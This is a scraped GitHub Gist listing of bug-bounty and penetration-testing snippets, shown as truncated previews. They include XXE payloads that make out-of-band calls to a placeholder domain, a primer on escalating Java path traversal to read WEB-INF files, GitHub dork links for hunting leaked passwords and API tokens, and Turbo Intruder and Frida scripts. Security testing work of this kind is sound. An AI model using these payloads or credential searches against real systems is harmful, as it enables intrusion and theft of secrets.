Bootstrap < 3.4.1 || < 4.3.1
✔️ CSP strict-dynamic bypass
➖ Requires user interaction
➖ Requires $('[data-toggle="tooltip"]').tooltip();
theblackturtle
defparam
/ cluster.py
Last active
December 15, 2023 10:19
Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering | |
| # Author: Evan Custodio (@defparam) | |
| # | |
| # MIT License | |
| # Copyright 2021 Evan Custodio | |
| # | |
| # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: | |
| # | |
| # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. | |
| # |
defparam
/ json_fuzz_poc.py
Created
March 10, 2021 15:11
Turbo Intruder JSON Fuzzing Example using JSONAccessor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # JSON Fuzz Proof of Concept using JSONAccessor | |
| # Author: Evan Custodio (@defparam) | |
| # | |
| # MIT License | |
| # Copyright 2021 Evan Custodio | |
| # | |
| # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: | |
| # | |
| # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. | |
| # |
SafeEval
/ poc-turbo-intruder-messageinfo-comment.py
Created
March 7, 2021 03:08
PoC: Automatic commenting from Burp Turbo Intruder scripts
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| poc-turbo-intruder-messageinfo-comment.py | |
| Jack Sullivan <[email protected]> | |
| This is a Burp Turbo Intruder PoC that shows how to automatically set the comment | |
| field from a Turbo Intruder script. Each comment will be persisted across other | |
| Burp plugins, like Logger++. | |
| The approach is to register a IHttpListener class that captures and exposes |
honoki
/ xxe-payloads.txt
Last active
November 11, 2024 17:01
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
harisec
/ exploit_path_traversals_in_Java_webapps.txt
Created
April 27, 2020 10:24
quick primer on how to exploit path traversals in Java web apps (i.e. you can read WEB-INF/web.xml)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| so, you can read WEB-INF/web.xml. how can you escalate this issue? | |
| [step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml. | |
| use a specialized wordlist such as the following (from Sergey Bobrov/BlackFan): | |
| https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt | |
| with time you can build your own wordlist adding files you've discovered over time. | |
| use Burp Intruder for this, it's perfect for this job. | |
| sort Intruder results by status code so you can see instantly which files were found. |
jhaddix
/ Github bash generated search links (from hunter.sh)
Created
January 12, 2020 19:55
Github bash generated search links (from hunter.sh)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "" | |
| echo "************ Github Dork Links (must be logged in) *******************" | |
| echo "" | |
| echo " password" | |
| echo "https://github.com/search?q=%22$1%22+password&type=Code" | |
| echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code" | |
| echo "" | |
| echo " npmrc _auth" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| a52dec | |
| acl | |
| acpi | |
| acpid | |
| adobe-source-code-pro-fonts | |
| adwaita-icon-theme | |
| akonadi-contacts | |
| alsa-lib | |
| alsa-plugins | |
| android-tools |
nullenc0de
/ auto_git_query
Last active
January 7, 2025 15:10
Automated Github Queries (Can open 29 tabs at a time)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code | |
| https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code | |
| https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code | |
| https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI |
Areizen
/ change_build_information.js
Last active
July 11, 2019 10:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function replaceFinaleField(object, fieldName, value){ | |
| var field = object.class.getDeclaredField(fieldName) | |
| field.setAccessible(true) | |
| field.set(null, value) | |
| } | |
| Java.perform(function(){ | |
| // Class containing const that we want to modify | |
| const Build = Java.use("android.os.Build") |
NewerOlder